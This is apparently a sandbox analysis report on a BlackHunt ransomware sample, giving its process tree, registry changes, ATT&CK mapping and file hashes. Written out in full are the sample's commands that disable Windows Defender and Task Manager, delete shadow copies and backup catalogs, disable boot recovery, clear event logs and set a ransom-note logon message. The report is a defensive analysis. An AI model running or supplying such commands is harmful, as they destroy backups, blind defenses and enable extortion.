description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe"C:\Users\Admin\AppData\Local\Temp\4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2076 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2484 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2248
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2408
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2532
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2448
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2660
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵PID:2672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2760
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2528
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:1952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2352
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:2060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2440
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:2364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2428
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:1284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:1096
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2664
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:2216
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2096
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:1820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2476
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2684
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2984
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1064
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1676
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2720
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1816
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1916
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1976
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:1144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1568
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:956
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1664
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2152
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2392
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe" /F2⤵PID:2692
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe" /F3⤵
- Creates scheduled task(s)
PID:2512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1812
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2492
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2716
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2252
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:1748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2220
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2012
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:268
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:3012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:488
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1104
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1044
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:4564
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:4536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:4548
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:4500
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:4592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:4528
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:4532
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:1932
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:2028
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:4164
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:4676
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:5116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:4244
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:4776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:4276
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:4044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:412
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:4020
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1616
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:5084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1756
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:4932
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:1248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:4820
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:3924
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:1824
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:3832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:1104
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:2332
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:4896
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:4752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:4716
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:4760
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:4084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:3828
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4224
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe"2⤵
- Deletes itself
PID:4876 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:4040
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2880
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2888
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1396
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:3180
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\1⤵
- Enumerates connected drives
PID:5020
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD53fb0e07e8ca99278cea05a0673307e0f
SHA1789a62618fe179c884d959d3a519ffe29c6e89db
SHA2565e2ad6a8e7e51cc111c2f03d91f463bd592f29e804bb605892256f39d781a7b8
SHA512ab677dc035c2fc71d730d788ade63c853500a39762104ce6bc940f628f71f03432caa23fcdc04ce42f18b07062f91b49cd7833e213eca7a93c29e15ca8cf4c71
-
Filesize
12KB
MD598d3d656af1175e2d530e654e44d805c
SHA1f89adc61a65e6aaee13e6ec486e9be789520f9e2
SHA25635b026a6cae4350afc07857fb9f41703ab41d0649db47d252ebd44161dc15c8c
SHA512e64a25d2d7bab54dd38e1ad850c7d9c4556e84024b9b0acd83198af75263ea116537e6051fd7676744907071b8b27de3b0d21dab741750917d910ab9ce719ae1
-
Filesize
684B
MD589cac51cada50c4b8a1c3b2b43fc25a6
SHA14c127251fef44c5030a53b18df45f937609fdc73
SHA2567b5b74fd9d54a3938cf5e85db345a81968d9c18f936b83f53c6b04cae5d7004a
SHA512d91bec8013396f134a1a81b2fec79c15ede0f08c9521a2618dcdf31762e647a1e5b73ef1da3dc3e076a8abd4f3b97ce7bdbe0d244d4dceed3d6bcf78106b0e6b